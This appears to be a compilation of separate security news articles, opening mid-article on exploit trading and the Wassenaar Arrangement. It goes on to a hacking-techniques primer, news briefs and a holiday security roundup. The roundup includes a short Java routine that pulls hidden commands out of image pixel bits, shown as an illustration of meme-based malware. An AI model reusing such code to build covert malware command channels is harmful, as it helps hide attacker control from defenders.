"If a seller wants to export dual-use technology such as exploits to a non-member state, it needs an arms license, which is very hard to get. Many well-known companies selling vulnerabilities to political actors operate in a gray zone and never applied for the license. Plenty of vulnerability deals violate Wassenaar, including Italy's Hacking Team, which sold exploit weapons to non-member states in the Middle East; many of the people selling exploits to Hacking Team came from Wassenaar members such as the US, a clear violation that was never pursued. The arrangement is more like a gentlemen's agreement, without much binding force. It is not a legal treaty; members implement it through their own national laws, with all the uncertainty that brings. In essence it is an agreement the US drove to keep non-allies from developing these weapon technologies: selling onward to the Middle East via Italy's Hacking Team is tolerated, but selling to China is not; a rather double-standard arrangement."

The Zhaike channel understands that apart from this arrangement there is no other written rule specifically governing vulnerability trading. Judging from China's policy moves in recent years, however, the country takes the governance of cyberspace data and information seriously; this year, for example, China issued rules controlling the export of critical data, and dedicated laws and regulations on vulnerabilities may follow.

The "hats" whose work revolves around vulnerabilities have three choices:

1. Disclose directly: the bad guys can use it and the good guys can fix it, but everyone is exposed to risk in the meantime;

2. Report to the vendor so the bug gets fixed; the vendor may pay a bounty (far below black-market prices, to be sure), and the reporter earns an acknowledgement or a place in the hall of fame;

3. Sell to a vulnerability broker, or even build the weapon yourself.

We have already seen choices of every kind, as well as disputes between reporters and vendors over how details were handled, but those are other stories.

Postscript

Rumor has it that MJ, having once fought through a field of famous teams to take the "Master of Pwn" crown, switched battlefields this year to compete in domestic contests.

I assumed that, for MJ, this would be a sore subject. To my surprise, MJ was quite at ease: "Our daily work isn't about winning contests; it's about protecting users better and racing black hats to find more vulnerabilities first. That's our goal. Contests are a by-product, a way to show the public you have this capability. Some contests genuinely help users learn which phone or browser is safer; their value is in showing the public the attacks and threats you might face in real life. Whether we can compete abroad, or where we compete, isn't particularly important."

Through this conversation I came to a new understanding of vulnerabilities and of the "hackers" who wield these heavy weapons. What kind of vulnerability can cost you your life? In shifting times, people are like ants: any vulnerability could take a life, and anyone could become the next Khashoggi. But as Leifeng.com's Zhaike channel has also reported, more "security people" have chosen to stop vulnerabilities from taking the privacy, property, and lives of thousands.

We will keep reporting.

References:

1. "The MJ0011 of the 'Hacker Empire'", Southern Metropolis Daily

2. "Spy company NSO posts its prices: letting governments monitor smartphone users", E安全

3. "What kind of company is NSO? Unmasking the creator of the Trident 0-days", CodeSec

4. "US says Israel sold Saudi Arabia spyware used to monitor Khashoggi's phone", Cankao Xiaoxi

This is an original Leifeng.com article; reproduction without authorization is prohibited. See the reposting policy for details.

[Anquanbang] How Microsoft catches internal leakers: tactics you can hardly guard against


Summary: Government-service login credentials of 40,000 users across 30 countries stolen. More than 40,000 phishing victims' online government-service accounts were compromised, and the information may already have been offered for sale on dark-web hacker forums. Group-IB researchers found the stolen logins grant access to services in 30 countries. The company said the compromised credentials were discovered by researchers through malware detection and reverse engineering as well as...

Government-service login credentials of 40,000 users in 30 countries stolen

More than 40,000 phishing victims' online government-service accounts were compromised, and the information may already be on sale in dark-web hacker forums. Researchers at Group-IB found that the stolen login data grants access to services in 30 countries worldwide. The company said the compromised credentials were discovered through malware detection and reverse engineering together with digital forensics. More than half of the victims are in Italy (52%), followed by Saudi Arabia (22%) and Portugal (5%). Users of government websites in other countries are also affected.

Source:

http://codesafe.cn/index.php?r=news/detail&id=4609

How Microsoft catches internal leakers: tactics you can hardly guard against

Vendors all have their own ways of tracing leaks; sometimes you see no identifying information in a screenshot you post online, yet the vendor can still pin down who leaked it. Industry giant Microsoft truly has its own tricks here. Years on, Microsoft staff have now revealed how they kept the internal beta of the Xbox 360's New Xbox Experience (NXE) UI from leaking. Twitter user @cullend recently wrote that one of his proudest projects at Microsoft tied each Xbox 360's serial number to the water-ripple pattern around the Xbox logo in the lower-right corner of the screen, so anyone who posted the UI online automatically exposed their console's identity. After the successful NXE beta, however, the shipped update did not include this identification, and Microsoft clarified that the technique was only used to keep the internal test from being leaked by NDA violators.

Source:

https://hot.cnbeta.com/articles/game/798963

Logitech Options flaw allowed keystroke-injection attacks; new release fixes it

Logitech Options is Logitech's official software for customizing its mice, keyboards, and touchpads. According to Threatpost, in September Google Project Zero security researcher Tavis Ormandy found a flaw in the software that could enable keystroke-injection attacks. Because Logitech did not fix it within the customary three months, the Project Zero team publicly disclosed the flaw on December 11. Two days later, Logitech said the newly released version 7.00 fixed it. Reportedly, an attacker could send a series of commands to the Options application from a rogue website and change a user's settings; by altering a few simple configuration settings, the attacker could send arbitrary keystrokes, gaining access to all kinds of information and even taking over the target device. Further, as long as the computer was on and the app was running in the background, an attacker could in theory maintain near-continuous access.

Source:

https://www.ithome.com/0/400/704.htm

Privacy backlash against Amazon's facial-recognition doorbell patent

Amazon's latest doorbell patent application has met fierce resistance. It envisions combining a doorbell camera with facial-recognition technology to build a system that matches images of people appearing at your door against a database of "suspicious persons"; on a match, the system would even pull up information about the person, and homeowners could upload photos of people they consider suspicious. The nightmarish concept comes from a camera-doorbell company called Ring, which the e-commerce giant acquired this year. Because the design can identify passers-by and send their photos to law enforcement, it has drawn condemnation from the American Civil Liberties Union (ACLU), and protests from Amazon's own employees and shareholders as well as the entire Congressional Black Caucus.

Source:

http://finance.jrj.com.cn/tech/2018/12/17085726752295.shtml

Bitcoin extortion returns: criminals blackmail four countries, take in less than $1

Foreign media report that starting on the afternoon of December 13, dozens of companies, schools, banks, government offices, and media organizations in English-speaking countries including the US, Canada, and Australia received "bomb threat" emails. Security researcher Troy Mursch said the targeted addresses were most likely obtained illicitly from databases or the dark web. The criminals' approach was also clumsy: mass-mailing demands for bitcoin payment made the messages easy to dismiss as spam scams. As of the afternoon of December 14 (US Eastern time), only two deposits totaling less than $1 had reached the extortion account. Still, from California to Toronto, the sudden wave of bomb scares at universities, companies, government offices, and law enforcement on a workday disrupted the daily running of entire cities.

Source:

https://www.cnbeta.com/articles/tech/799299.htm

2018's 100 "worst passwords" announced: 123456 tops the list for the fifth straight year

US security software company SplashData published its 100 "worst passwords" of 2018. The numeric string "123456" took first place for the fifth consecutive year, with "password" second. The rest, in order, were 123456789, 12345678, 12345, 111111, 1234567, sunshine, qwerty (the first six letters of the keyboard's top row), and iloveyou. Amusingly, the US president's first name, "donald", entered the list for the first time this year, at number 23.

Source:

http://hqtime.huanqiu.com/article/a-XDJBCW36E53DB1C4C70461

Two-factor authentication is not 100% safe: new technique shown to break into Gmail accounts

Security experts said last Thursday that recent phishing campaigns against US government officials, activists, and journalists are increasingly rampant, and use technical means to bypass the two-factor authentication (2FA) protections widely used by Gmail and Yahoo Mail. The incident shows once again that 2FA relying on single sign-on or one-time passcodes carries risk, especially codes sent to a user's phone by SMS. Researchers at security firm Certfa Lab wrote in a blog post that attackers with Iranian government backing collected detailed information on their targets and used it to craft phishing emails tailored to them. The emails contained a hidden image that activated as soon as the target viewed the message. The researchers said the attackers checked victims' usernames and passwords on their own servers in real time, and even when 2FA via SMS, an authenticator app, or one-tap sign-in was enabled, they could still deceive the target and steal that information.

Source:

http://hackernews.cc/archives/24627

About Anquanbang

Anquanbang (安全帮) is the security team of China Telecom's Beijing Research Institute, aiming to become the "leader in SaaS security services". It currently has a "1+4" product line: one SaaS store (www.anquanbang.vip) and four platforms (an SDS software-defined security platform, a security capability open platform, a security big-data platform, and a security situational-awareness platform).

Related articles: [Anquanbang] SQLite flaw affects all Chromium-based browsers; [Anquanbang] "Driver Genius" update carries trojan, infecting tens of thousands of computers in half a day; [Anquanbang] Serious flaw nearly exposed 400 million Microsoft accounts; unemployed hacker earns up to $500,000 a year testing bugs for bounties; [Anquanbang] New Android trojan steals funds from PayPal accounts; [Anquanbang] Lenovo laptop stolen containing unencrypted data of thousands of employees



Warning! Don't let your computer fall victim to these hacking techniques


As we all know, hackers can gain unauthorized access to information that should stay private, such as credit card details, email account credentials, and other personal data. So it is worth understanding some of the techniques commonly used to obtain your personal information without authorization. Here are several common hacking techniques.

1. Bait and switch

Using bait-and-switch, an attacker buys advertising space on a website. When a user clicks the ad, they may be directed to a page infected with malware; this is one of the easiest ways to get infected. From there, attackers can install further malware or adware on your computer. The ads and download links used in this technique are deliberately attractive, and users are expected to end up clicking them. The hacker can then run a malicious program the user believes to be genuine, gaining unauthorized access to the machine once it is installed.

2. Cookie theft

A browser's cookies hold personal data such as browsing history, usernames, and passwords for the sites we visit. Once a hacker gains access to your cookies, they can even authenticate as you in a browser. A popular way to carry out this attack is to route the victim's IP packets through the attacker's machine. Also known as SideJacking or session hijacking, the attack is easy to execute if the user does not use SSL (https) for the entire session. On websites where you enter passwords and banking details, an encrypted connection is critical.

3. Clickjacking

Clickjacking also goes by another name, UI redress. In this attack, the hacker hides the actual UI element the victim is meant to click. The behavior is very common on app-download, movie-streaming, and torrent sites. While most operators use it to earn advertising money, others can use it to steal your personal information. In other words, the attacker hijacks the victim's clicks, directing them not to the page the victim sees but to a page the hacker wants. It works by tricking an internet user into performing an undesired action by clicking a hidden link.

4. Viruses, trojans, and the rest

Viruses and trojans are malicious software programs that get installed on the victim's system and keep sending the victim's data to the hacker. They can also lock your files, serve fraudulent ads, divert traffic, sniff your data, or spread to every computer connected to your network. You can read about the comparisons and differences between the various kinds of malware, worms, trojans, and so on at the link below.

5. Phishing

Phishing is a technique in which a hacker clones a frequently visited website and snares victims by sending spoofed links. Combined with social engineering, it becomes one of the most used and deadliest attack vectors. Once the victim tries to log in or enters data, the hacker harvests the target's private information using a trojan running on the fake site. Phishing via iCloud and Gmail accounts was the route taken by the hackers behind the "Fappening" breach, which targeted numerous female Hollywood celebrities.

6. Eavesdropping (passive attack)

Unlike other attacks, which are active by nature, a passive attacker simply monitors computer systems and networks to capture some unwanted information. The motive behind eavesdropping is not to damage the system but to gather information without being identified. These attackers can target email, instant-messaging services, phone calls, web browsing, and other communication methods. Those who indulge in such activity are typically black-hat hackers, government agencies, and the like.

7. Fake WAP

Even just for fun, a hacker can use software to fake a wireless access point that connects to the official public-venue WAP. Once you join the fake WAP, the hacker can access your data, as in the example above. It is one of the easiest attacks to pull off, needing only simple software and a wireless network. Anyone can name their WAP something legitimate like "Heathrow Airport WiFi" or "Starbucks WiFi" and start spying on you. One of the best ways to protect yourself from such attacks is to use a high-quality VPN service.

8. Watering hole attacks

If you are a fan of Discovery or National Geographic, you can relate easily to watering-hole attacks. To poison a place, the hacker hits the physical point the victims can be reached at most easily; poison a river at its source, for example, and it will hit the entire animal population in summer. In the same way, hackers target the most-visited physical location to attack victims: a coffee shop, a cafeteria, and so on. Once hackers know your schedule, they may use this type of attack to create a fake Wi-Fi access point and modify your most-visited websites, redirecting them to capture your personal information. Because the attack collects information on users from one specific place, detecting the attacker is even harder. Once again, following basic security practices and keeping your software and operating system up to date is one of the best defenses.

9. Denial of service (DoS/DDoS)

A denial-of-service attack takes down a site or server by flooding it with so much traffic that the server cannot process all the requests in real time and finally crashes. In this popular technique, the attacker floods the target machine with a huge number of requests to swamp its resources, which in turn prevents legitimate requests from being fulfilled. For DDoS attacks, hackers often deploy botnets of zombie machines whose only job is to flood your system with request packets. Over time, as malware and hacker types keep evolving, the scale of DDoS attacks keeps growing.

10. Keylogging

A keylogger is a simple piece of software that records the key sequences and strokes of your keyboard into a log file on the machine; those log files may even contain your personal email IDs and passwords. Also known as keyboard capturing, it can be software or hardware. Software-based keyloggers target the programs installed on a computer, while hardware devices target the keyboard, electromagnetic emissions, smartphone sensors, and so on. Keyloggers are a major reason online banking sites offer a virtual keyboard option, so be especially careful whenever you use a computer in a public setting.

To sum up: understanding common hacking techniques such as phishing, DDoS, and clickjacking can help keep you and your data safe.

When your phone slips from your hand, this "airbag" wants it to land safely


Probably everyone has dropped a phone. You may have had to spend hundreds of yuan, or more, replacing a shattered screen, or found the phone was a write-off. But what if the phone had an "airbag"?

Philip Frenzel, an engineer at Aalen University in Germany, designed an "active protection" device for phones: when the phone is accidentally dropped, eight curled spring leaves rapidly shoot out from its four corners, keeping the phone from striking the ground directly and cushioning the impact elastically.

In terms of how it works, the "active protection" device is built into a phone case containing a drop sensor and metal spring leaves. When the phone falls, the sensor detects the free-fall state and drives the eight metal leaves to deploy, protecting the device. After picking the fallen phone up, the user simply folds the leaves back into the case, ready for the next drop.

Frenzel's original idea was to fit the phone with an actual airbag, but foam-based and other alternatives proved entirely impractical, and Frenzel did not want to spoil the phone's looks with an ugly protective shell. Judging by the product demo, he succeeded.

The idea won the top prize from the German mechatronics society, and Frenzel has applied for a patent. The project's two founders plan to raise money through crowdfunding, with the product launching on Kickstarter in July.

The "active protection" device looks great, but some problems may remain. For instance, if the phone is in your pocket when you jump down from somewhere, or you simply swing your arm while holding it, the drop sensor would presumably fire the metal leaves, which could be rather painful. Perhaps Frenzel will add a proximity sensor so the leaves stay put when the phone is detected to be in a pocket or bag.

Also, with a sensor and leaf-actuation hardware built in, the case presumably needs a battery or charging, which users may find tiresome. And judging by its appearance, the case noticeably adds thickness, seemingly undoing the painstaking work phone makers put into shaving off a single millimeter.

For the cracked-screen problem, many vendors already offer screen-breakage insurance, sometimes for only about a hundred yuan (99 yuan/year for the Smartisan Nut Pro 2, 129 yuan/year for OPPO), which may well be no more expensive than this case's eventual retail price.

So, would you buy this "active protection" phone case?

Memes, messengers, and missiles: From Twitter to chat apps and weapons, security ...


Roundup: We are now firmly into the holiday season, the Christmas parties are kicking off, and folks are swapping their Excel files for eggnog, or something cliched like that.

So, let's have a quick look around the world of security this week before everyone puts on the "out of office".

On the first day of Christmas my true love gave to me: a nuke that didn't have security

Quick, think of the one place you really don't want to see failing security.

Did you answer "intercontinental ballistic missiles"? Bad news…

A report from the US Department of Defense Inspector General's office has found that America's missile command is falling way behind when it comes to the security of its Ballistic Missile Defense System (BMDS). The summary of their findings is brief and to the point:

"We determined that officials did not consistently implement security controls and processes to protect BMDS technical information."

Among the failings spotted in the report were a failure to install multifactor authentication software, server racks left unlocked, intrusion-detection tools missing from one classified network, and data transmitted without encryption.

"In addition, facility security officers did not consistently implement physical security controls to limit unauthorized access to facilities that managed BMDS technical information," the December dossier noted.

The report recommends, not surprisingly, that the DoD look to first install these basic protections on the network and then get their act together as far as making sure access to both the data and the physical facilities housing it are locked off with access carefully logged and monitored.

Meanwhile... A mall-patrolling robot in Los Angeles has a strange hunger for shoppers' MAC addresses on their devices. Also, it turns out it's possible to defeat facial-recognition in some Android phones and unlock one of those unfortunate devices using a 3D-printed head of the owner, provided you have 50 cameras, top-of-the-line equipment, and about 300 quid to spend on the caper.

We three memes controlling your bots

Researchers at Trend Micro have uncovered a truly remarkable scheme that malware-infected PCs are using to communicate with their central command-and-control servers.

The software nasty, given the catchy name "TROJAN.MSIL.BERBOMTHUM.AA", instructs infected Windows machines to look for a specific (since disabled) Twitter account. The account itself wasn't remarkable, containing only a few meme images. Hidden within those images, however, was the code that controlled the infected PCs.

The malware would download and open the images, then look for instructions hidden within. In this case, the memes tell the bots to capture screencaps of their host machines and send the images to a server, though the malware can also be ordered to list running processes, copy clipboard contents, and list filenames from the infected PC.

"We found that once the malware has been executed on an infected machine, it will be able to download the malicious memes from the Twitter account to the victim’s machine. It will then extract the given command," Trend explained.

"In the case of the “print” command hidden in the memes, the malware takes a screenshot of the infected machine. It then obtains the control server information from Pastebin. Afterwards, the malware sends out the collected information or the command output to the attacker by uploading it to a specific URL address."

Fortunately, it looks like this specific operation has been broken up. The meme-spaffing Twitter account has been disabled.
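
Trend's post doesn't spell out the exact embedding format here, but the underlying trick, image steganography, is easy to demonstrate. Purely as an illustration, the sketch below assumes the simplest possible scheme, one command byte spread across the least-significant bits of eight consecutive pixels and terminated by a NUL byte; the class name and encoding are our own invention, not the actual TROJAN.MSIL.BERBOMTHUM.AA format:

import javax.imageio.ImageIO;
import java.awt.image.BufferedImage;
import java.io.ByteArrayOutputStream;
import java.io.File;

public class LsbExtract {
    // Rebuild a hidden ASCII command from the least-significant bit of the
    // blue channel of consecutive pixels, scanning left-to-right, top-to-bottom.
    public static String extract(File image, int maxBytes) throws Exception {
        BufferedImage img = ImageIO.read(image);
        ByteArrayOutputStream out = new ByteArrayOutputStream();
        int bits = 0, current = 0;
        scan:
        for (int y = 0; y < img.getHeight(); y++) {
            for (int x = 0; x < img.getWidth(); x++) {
                current = (current << 1) | (img.getRGB(x, y) & 1); // blue-channel LSB
                if (++bits == 8) {
                    if (current == 0 || out.size() == maxBytes) break scan; // NUL ends it
                    out.write(current);
                    bits = 0;
                    current = 0;
                }
            }
        }
        return out.toString("US-ASCII");
    }

    public static void main(String[] args) throws Exception {
        System.out.println("hidden command: " + extract(new File(args[0]), 256));
    }
}

Flipping the low bit of a color channel is imperceptible to the eye, which is exactly why an innocuous-looking meme makes a convenient carrier for something like the "print" command.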

Up in the Outback, Signal's pause; out with the Aussie backdoor clause

Secure chat company Signal is less than happy with the recently passed Australian law targeting encrypted communications. The new Oz rules let Aussie snoops demand surveillance backdoors in communications software and websites, allowing the government to read and monitor encrypted messages.

Signal dev Josh Lund said his project simply can't comply with any government demand to decrypt secure end-to-end chatter. No, really, Lund said, there is no physical way Signal could remotely decrypt the contents of conversations.

"By design, Signal does not have a record of your contacts, social graph, conversation list, location, user avatar, user profile name, group memberships, group titles, or group avatars. The end-to-end encrypted contents of every message and voice/video call are protected by keys that are entirely inaccessible to us," Lund explained .

"In most cases now we don’t even have access to who is messaging whom."

This means that Signal faces the very real possibility of being banned in Australia for running afoul of the data access law. Even in that case, however, Lund cautioned the gov-a-roos that they probably wouldn't be able to rid their continent of Signal.

"Historically, this strategy hasn’t worked very well. Whenever services get blocked, users quickly adopt VPNs or other network obfuscation techniques to route around the restrictions," he explained. "If a country decided to apply pressure on Apple or Google to remove certain apps from their stores, switching to a different region is extremely trivial on both Android and iOS. Popular apps are widely mirrored across the internet."

In other words, the Australian government would be playing whack-a-mole with banned apps, all while the likes of Google, Microsoft, Apple, and other US tech giants are thoroughly cheesed off with the incoming spy law.


Simply having a fight over Dragonfly

Google's Dragonfly campaign just got Choc-blocked, allegedly.

A report from The Intercept today indicates that the controversial project to build a Chinese search engine that met Beijing's censorship requirements has been "effectively ended" following an employee revolt and probing by US Congress.

Dragonfly, for those not familiar, was Google's rumored partnership with the Chinese government to create a version of its web search engine that could automatically exclude any results that were banned by the government as well as provide officials with the ability to track people's search queries.

Concern over the privacy and human rights implications of such a project prompted staffers, including Google's precious engineer caste, to speak out in public, something rarely seen from the highly insular world of Google.

When asked for comment, a Google spokesperson referred El Reg to the comments CEO Sundar Pichai made last week to Congress.

Jingle Bells, Twitter smells, surveillance by bad eggs

And because creepy government surveillance is all the rage these days, we have Twitter warning that one of its web applications might have been used to slurp up location data on some twits.

In its alert on Monday, Twitter warns that one of its support forums had an issue that would have allowed miscreants to look up things like fellow tweeters' telephone country codes, and whether an account was locked out by Twitter. The bug was fixed on November 16.

This by itself isn't too much of a problem. However, Twitter also said that prior to the November fix, it spotted "a large number of inquiries coming from individual IP addresses located in China and Saudi Arabia," and that it can't rule out that the collection of this location-based info was the work of state-backed hackers or spies.

In short, Twitter had a flaw that would betray your country code, and two of the most oppressive regimes on the planet may have abused it to collect user information en masse. "Falalalala, la la la laaaa!"
